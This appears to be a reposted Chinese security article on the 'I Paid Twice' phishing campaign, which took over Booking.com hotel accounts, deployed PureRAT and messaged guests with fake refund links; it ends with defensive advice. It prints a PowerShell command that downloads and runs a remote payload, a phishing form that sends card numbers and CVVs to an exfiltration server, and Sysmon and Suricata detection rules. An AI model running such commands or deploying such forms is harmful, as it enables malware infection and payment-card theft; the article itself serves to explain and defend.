当“我已付款两次”成为钓鱼暗号:Booking.com生态遭系统性渗透,全球酒店与旅客陷信任危机

2025年11月,网络安全公司Sekoia发布一份警报,揭示一场代号为“I Paid Twice”(我已付款两次)的全球性网络钓鱼行动正悄然侵蚀在线旅游平台的信任根基。这场攻击并非针对单一漏洞或用户疏忽,而是精准利用了Booking.com生态系统中最脆弱的一环——人与人之间的沟通信任。

据eSecurity Planet援引Sekoia报告,自2025年4月以来,该团伙已成功入侵数百家酒店的Booking.com后台账户,并以此为跳板,向真实住客发送伪装成“重复扣款退款”或“银行验证失败需重新支付”的消息。受害者一旦点击链接,便会落入精心仿制的支付页面,银行卡信息、CVV码乃至一次性验证码(OTP)尽数被窃。更令人担忧的是,部分攻击者甚至诱导旅客通过WhatsApp完成“私下转账”,彻底绕过平台风控体系。

这不是一起孤立事件,而是一场融合了凭证盗窃、远程控制木马、社交工程与黑市交易的全链条犯罪行动。它不仅让全球数万旅客蒙受经济损失,更将酒店业推入一场前所未有的品牌信任危机。而对于中国蓬勃发展的在线旅游与本地生活服务平台而言,这面来自欧洲的“照妖镜”,或许正映照出我们尚未察觉的风险暗礁。

一、“我已付款两次”:一句看似合理的求助,如何变成钓鱼钩?

“I Paid Twice”攻击之所以高效,核心在于其话术设计深谙人性弱点——焦虑+权威+紧迫感。

想象你刚预订了一家巴厘岛度假酒店,几天后收到一封来自“酒店经理”的Booking.com站内信:

“尊敬的客人,您好!我们的财务系统显示您的订单#123456被重复扣款两次(共€800)。为尽快处理退款,请您点击以下链接确认收款账户信息:[verify-payment.booking-support[.]com]。若24小时内未操作,退款将自动延迟至下月。”

邮件署名、订单号、金额均准确无误——因为攻击者早已通过被控酒店账户获取了你的全部预订数据。这种“精准诈骗”远超传统广撒网式钓鱼,成功率极高。

Sekoia追踪发现,攻击流程分为三阶段:

阶段1:横向渗透酒店账户

攻击者首先通过鱼叉式钓鱼邮件(如伪造Booking.com通知:“您的账户存在异常登录,请立即验证”)诱使酒店员工点击恶意链接。该链接表面是“安全验证”,实则执行一段PowerShell命令:

# 恶意PowerShell载荷示例(经脱敏处理)

IEX (New-Object Net.WebClient).DownloadString('http://malicious[.]ru/payload.ps1')

该脚本会下载一个ZIP包,内含一个伪装成“PDF查看器”的可执行文件和配套DLL。一旦运行,即触发PureRAT(PureHVNC)远程访问木马安装。

阶段2:接管通信渠道,冒充身份

PureRAT赋予攻击者完全控制权:记录键盘、截屏、窃取浏览器Cookie、甚至启用摄像头。更重要的是,它能直接读取酒店员工在Booking.com Extranet后台的会话Cookie,无需密码即可长期维持登录状态。

此时,攻击者便能以“酒店官方”身份,在Booking.com平台内向任意住客发送消息——平台标识、头像、历史对话上下文一应俱全,毫无破绽。

阶段3:引流至仿冒支付页或外部聊天

消息中附带的链接通常指向托管于俄罗斯BulletProof主机的钓鱼站点。这些站点使用Let's Encrypt证书,界面1:1复刻Booking.com支付流程,甚至动态加载真实酒店图片和房型描述。

<!-- 钓鱼页面关键代码片段 -->

<form action="https://exfil-server[.]ru/collect" method="POST">

<h2>Booking.com 安全验证</h2>

<p>为处理您的重复付款,请确认以下信息:</p>

<input type="text" name="card_number" placeholder="信用卡号" required>

<input type="text" name="expiry" placeholder="有效期 (MM/YY)" required>

<input type="text" name="cvv" placeholder="CVV" required>

<button type="submit">提交以完成退款</button>

</form>

<!-- 隐藏字段传递受害者身份 -->

<input type="hidden" name="booking_id" value="123456">

<input type="hidden" name="hotel_name" value="Bali Paradise Resort">

一旦提交,数据直传C2服务器。更有甚者,攻击者会要求:“为加快处理,请加我WhatsApp:+XX XXXXXXXX”,引导用户进入完全脱离平台监管的私聊环境,实施更复杂的诈骗。

二、PureRAT:藏在“PDF查看器”里的数字幽灵

此次事件中,PureRAT的出现尤为值得关注。这款最初在俄语黑客论坛销售的远程控制木马,近年来已演变为成熟的Malware-as-a-Service(MaaS)产品,月租仅需$200–$500。

其技术特性使其成为酒店这类高价值目标的理想武器:

无文件执行能力:可通过PowerShell或WMI在内存中加载,规避传统AV检测;

模块化插件架构:支持按需加载键盘记录器、屏幕捕获、文件窃取等模块;

加密C2通信:使用TLS 1.3与硬编码公钥通信,流量特征接近正常HTTPS;

持久化机制多样:可注册为Windows服务、写入注册表Run键、或注入explorer.exe进程。

Sekoia披露,PureRAT在本次攻击中常通过DLL侧加载(DLL Side-Loading)技术实现免杀。例如,攻击者分发一个名为AcroRd32.exe(Adobe Reader主程序)的合法签名文件,但同目录下放置恶意pdfium.dll。当用户双击“PDF”时,系统会优先加载当前目录的DLL,从而执行恶意代码。

# Sysmon事件日志检测规则(Rule for detecting DLL Side-Loading)

<RuleGroup name="Suspicious DLL Loading" groupRelation="or">

<ProcessCreate onmatch="include">

<Image condition="end with">AcroRd32.exe</Image>

<CommandLine condition="contains">pdfium.dll</CommandLine>

</ProcessCreate>

</RuleGroup>

此类高级持续性威胁(APT)手法出现在商业钓鱼中,标志着网络犯罪正从“机会主义”向“专业化作战”跃迁。

三、黑市狂欢:被盗酒店账户明码标价

“I Paid Twice”背后,是一个高度组织化的地下经济生态。Sekoia在俄语论坛LolzTeam和Exploit.in上发现,大量帖子公然兜售“Booking.com Extranet Logs”。

所谓“Logs”,并非简单账号密码,而是由信息窃取木马(如RaccoonStealer、RedLine)打包的完整会话凭证包,包含:

浏览器Cookie(可直接登录Extranet);

保存的密码;

用户代理字符串;

IP地理位置;

甚至两步验证的备份代码。

这些Logs按酒店星级、月订单量、所在国家分级定价,从$30到$5,000不等。一名ID为“moderator_booking”的卖家声称,其团队每月可提供200+个有效Booking.com账户。

“这已形成完整产业链:木马开发者 → 信息窃取者 → 账户打包商 → 钓鱼运营者 → 洗钱中介。”公共互联网反网络钓鱼工作组技术专家芦笛指出,“酒店账户之所以值钱,是因为它既是‘可信发信源’,又是‘支付指令通道’——双重价值叠加。”

更讽刺的是,部分攻击者甚至提供“售后服务”:若某账户因异常活动被封,可免费更换新账户。这种“SaaS化”运营,让钓鱼成本大幅降低,门槛急剧下降。

四、国内启示:从“携程”到“美团”,信任链同样脆弱

尽管“I Paid Twice”主要针对欧美酒店,但其攻击逻辑在中国市场同样适用。国内OTA(在线旅行社)如携程、飞猪,以及本地生活平台如美团、大众点评,均依赖商家后台与用户私信沟通订单变更、退款等事宜。

2024年,某安全厂商曾披露一起仿冒“美团商家助手”App的事件:攻击者诱导餐饮店主安装恶意应用,窃取其商家后台Cookie,随后向顾客发送“订单异常需补差价”消息,附带钓鱼链接。

“中国市场的特点在于,用户对平台内消息的信任度极高,且移动支付普及率全球领先。”芦笛分析,“一旦攻击者控制商家账号,诱导用户扫码支付或点击H5页面输入银行卡,损失可能更快、更隐蔽。”

尤其值得警惕的是,国内部分中小酒店、民宿仍使用个人微信/QQ与客人沟通,甚至接受微信转账。这种“去平台化”操作,虽提升服务灵活性,却彻底放弃了平台提供的交易保障与纠纷追溯能力,为钓鱼诈骗大开方便之门。

五、防御之道:重建信任,需技术与流程双轮驱动

面对如此精密的攻击,单点防御已无济于事。必须构建覆盖预防—检测—响应—恢复的全周期防线。

对酒店与商户:

强制启用多因素认证(MFA):即使密码泄露,攻击者也无法登录Extranet;

最小权限原则:前台员工账号仅限查看订单,无权修改价格或发送消息;

定期审计登录设备与IP:发现异常地理位置(如非营业地登录)立即冻结;

绝不引导用户离开平台:所有退款、改单必须通过官方支付通道完成。

对平台方(如Booking.com、携程等):

强化行为分析引擎:监测异常消息模式(如高频发送含“refund”“payment failed”的消息);

部署设备指纹技术:识别同一设备频繁切换不同酒店账号的行为;

引入消息内容沙箱:对含链接的消息自动渲染预览,检测是否指向已知钓鱼域名;

建立快速举报与冻结通道:允许用户一键标记可疑消息,平台15分钟内响应。

对安全社区:

工作组建议,各机构应共享PureRAT的C2 IP、钓鱼域名、SSL证书哈希等IOC,并通过自动化工具实时阻断。

例如,以下Suricata规则可检测PureRAT典型心跳包:

alert http any any -> any any (msg:"PureRAT C2 Beacon";

content:"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36";

pcre:"/\/[a-f0-9]{8}-[a-f0-9]{4}-[a-f0-9]{4}/U";

classtype:trojan-activity; sid:20251107; rev:1;)

六、结语:信任不可外包,安全始于每一道门

“I Paid Twice”骗局最令人不安之处,在于它没有利用0day漏洞,没有突破防火墙,而是轻轻撬开了人类心理与业务流程中最柔软的缝隙——对“官方渠道”的无条件信任。

当一家百年老店的Booking.com账号沦为钓鱼工具,当一位旅行者因“重复扣款”恐慌而交出银行卡信息,受损的不仅是金钱,更是整个数字经济赖以运转的信任基石。

对中国而言,这场发生在巴厘岛与巴黎的危机,是一记响亮的警钟。在追求用户体验极致便捷的同时,我们是否过度牺牲了安全冗余?在鼓励商家与用户“直接沟通”的同时,是否忽略了平台作为“信任中介”的不可替代性?

正如芦笛所言:“安全不是功能,而是前提。没有安全的信任,终将成为骗子的通行证。”

未来,或许每一家酒店、每一个平台、每一位用户,都需要学会在便利与警惕之间,找到那条微妙的平衡线——因为下一次,“我已付款两次”的消息,可能就出现在你的收件箱里。

编辑:芦笛(公共互联网反网络钓鱼工作组)

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/1172839.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

家用卫浴怎么选?厂家口碑领先推荐,评价高的卫浴口碑推荐榜优质企业盘点及核心优势详细解读 - 品牌推荐师

随着消费升级与健康家居理念的深入,家用卫浴市场正经历一场从“满足基本功能”到“追求品质、健康与美学体验”的深刻变革。消费者在选购时,不再仅仅关注单一产品的价格与外观,而是将目光投向了整个水路系统的安全性…

吐血推荐9个AI论文工具,自考学生轻松搞定毕业论文!

吐血推荐9个AI论文工具&#xff0c;自考学生轻松搞定毕业论文&#xff01; 自考论文写作的“秘密武器”&#xff1a;AI 工具如何改变你的学习节奏 在自考学习的过程中&#xff0c;毕业论文往往是最让人头疼的一环。面对繁杂的选题、复杂的结构和严格的格式要求&#xff0c;许多…

钓鱼团伙用Telegram机器人“接单”:欧洲凭证窃取进入“实时客服”时代

一、当钓鱼攻击有了“客服系统”&#xff1a;点击链接后&#xff0c;有人在Telegram上等你2025年深秋&#xff0c;一位荷兰阿姆斯特丹的中小企业主收到一封看似来自本地银行ING的邮件&#xff1a;“您的账户因异常登录被临时冻结&#xff0c;请立即验证身份。”他点开链接&…

2025年度花灯供应商评选:十大品牌力荐,景区灯会/水上花灯/传统花灯/夜景布置灯/庙会花灯/西游记花灯/古镇花灯工厂怎么选购 - 品牌推荐师

随着文旅融合的深入与夜游经济的蓬勃发展,花灯作为承载传统文化与创新科技的重要载体,其市场需求持续增长,对供应商的综合能力也提出了更高要求。面对市场上众多的花灯供应商,如何选择一家兼具文化底蕴、创意设计、…

MySQL 核心机制精讲:B+树查询、Buffer Pool、COUNT 优化与 CHAR/VARCHAR 实战指南

一、请详细描述一下MySQLB树查询数据的过程B树查询数据分两个阶段&#xff1a; 1. 先从根节点往下定位到叶子节点。 2. 在叶子节点内部定位到具体的数据行。第一阶段是树的垂直查找&#xff0c;从根节点开始&#xff0c;要查询的键值和节点内存储的索引的键值作比较&#xff0c…

救命神器2026继续教育TOP10AI论文写作软件测评与推荐

救命神器2026继续教育TOP10AI论文写作软件测评与推荐 2026年继续教育领域AI论文写作工具测评维度解析 随着人工智能技术的不断进步&#xff0c;AI写作工具在学术研究与继续教育领域的应用日益广泛。然而&#xff0c;面对市场上琳琅满目的产品&#xff0c;如何选择真正适合自身需…

校友会2026年中国农林类大学排名,中国农业大学、华南农业大学珠江学院、新疆农业职业技术大学、江苏农林职业技术学院第一

为了给2026年全国高考考生报考中国农林类高校提供参考指南&#xff0c;2026年1月12日&#xff0c;全国第三方大学评价机构艾瑞深校友会网(Cuaa.net)撰写完成、科学出版社即将出版的《2026校友会中国大学排名&#xff1a;高考志愿填报指南》最新发布校友会2026中国农林类大学排名…

2025中国力学大会AI+分享 | 四川大学张来平研究员:基于图神经网络的流场预测方法研究进展

作者简介&#xff1a;张来平&#xff0c;博士&#xff0c;原军科院创新研究院研究员。长期从事计算流体力学研究&#xff0c;主要研究领域包括&#xff1a;复杂外形网格生成技术、非结构网格高精度计算方法、高性能计算、大型CAE工业软件研发及在航空航天中的应用等。近年来专注…

GESP认证C++编程真题解析 | P11964 [GESP202503 七级] 图上移动

​欢迎大家订阅我的专栏&#xff1a;算法题解&#xff1a;C与Python实现&#xff01; 本专栏旨在帮助大家从基础到进阶 &#xff0c;逐步提升编程能力&#xff0c;助力信息学竞赛备战&#xff01; 专栏特色 1.经典算法练习&#xff1a;根据信息学竞赛大纲&#xff0c;精心挑选…

博士答辩PPT分享 | 高雷诺数湍流场数据同化与湍流模型机器学习研究

个人简介&#xff1a;孙旭翔&#xff0c;西北工业大学航空学院2019级流体力学专业博士生&#xff0c;研究方向为数据同化与数据驱动湍流建模。在Machine Learning-Science and Technology、Journal of Computational Science、Computers & Fluids发表SCI论文三篇。论文题目…

校友会2026年中国财经类大学排名,上海财经大学、西安欧亚学院、广东工商职业技术大学、浙江金融职业学院第一

为了给2026年全国高考考生报考中国财经类高校提供参考指南&#xff0c;2026年1月12日&#xff0c;全国第三方大学评价机构艾瑞深校友会网(Cuaa.net)撰写完成、科学出版社即将出版的《2026校友会中国大学排名&#xff1a;高考志愿填报指南》最新发布校友会2026中国财经类大学排名…

GESP认证C++编程真题解析 | P11965 [GESP202503 七级] 等价消除

​欢迎大家订阅我的专栏&#xff1a;算法题解&#xff1a;C与Python实现&#xff01; 本专栏旨在帮助大家从基础到进阶 &#xff0c;逐步提升编程能力&#xff0c;助力信息学竞赛备战&#xff01; 专栏特色 1.经典算法练习&#xff1a;根据信息学竞赛大纲&#xff0c;精心挑选…

视频技术在现代社会中的应用与发展

视频技术在现代社会中的应用与发展 引言 随着科技的飞速发展,视频技术已经成为现代生活中不可或缺的一部分。从日常娱乐到工作沟通,视频技术在各个方面都扮演着重要角色。本文将探讨视频技术的基本概念、应用领域、发展现状以及未来趋势。 一、视频技术的基本概念 1.1 视…

校友会2026年天津市大学排名,南开大学、天津仁爱学院、天津职业大学、天津轻工职业技术学院第一

为了给2026年全国高考考生报考天津市高校提供参考指南&#xff0c;2026年1月12日&#xff0c;全国第三方大学评价机构艾瑞深校友会网(Cuaa.net)撰写完成、科学出版社即将出版的《2026校友会中国大学排名&#xff1a;高考志愿填报指南》最新发布校友会2026天津市大学排名。北京大…

有哪些SRM系统是专门为供应链管理设计的? - 企业数字化观察家

众所周知,供应链管理已经成为企业降本增效、提升协同效率和增强抗风险能力的核心环节,而 SRM(供应商关系管理)系统,正是企业在供应链管理过程中,用来规范供应商协作、控制采购风险、提升整体效率的重要工具。 但…

实用指南:java基础-LinkedList(链表)

pre { white-space: pre !important; word-wrap: normal !important; overflow-x: auto !important; display: block !important; font-family: "Consolas", "Monaco", "Courier New", …

计算机毕业设计Django+Vue.js高考推荐系统 高考分数线预测 大数据毕设(源码+LW文档+PPT+讲解)

温馨提示&#xff1a;文末有 CSDN 平台官方提供的学长联系方式的名片&#xff01; 温馨提示&#xff1a;文末有 CSDN 平台官方提供的学长联系方式的名片&#xff01; 温馨提示&#xff1a;文末有 CSDN 平台官方提供的学长联系方式的名片&#xff01; 技术范围&#xff1a;Sprin…

二分搜索树深度优先遍历

二分搜索树深度优先遍历 引言 二分搜索树&#xff08;Binary Search Tree&#xff0c;BST&#xff09;是一种特殊的树形数据结构&#xff0c;其特点是每个节点都有一个键值&#xff0c;左子节点的键值小于其父节点的键值&#xff0c;右子节点的键值大于其父节点的键值。深度优先…

互联网大厂Java小白求职面试全解析:从Spring到微服务与大数据

场景&#xff1a;求职者超好吃的面试 超好吃是一名刚毕业的Java程序员&#xff0c;今天他来到一家互联网大厂进行面试&#xff0c;面试官态度严肃&#xff0c;但也愿意指导初学者。以下是他们的对话内容&#xff1a;第一轮提问&#xff1a;Spring框架与基础Java 面试官&#xf…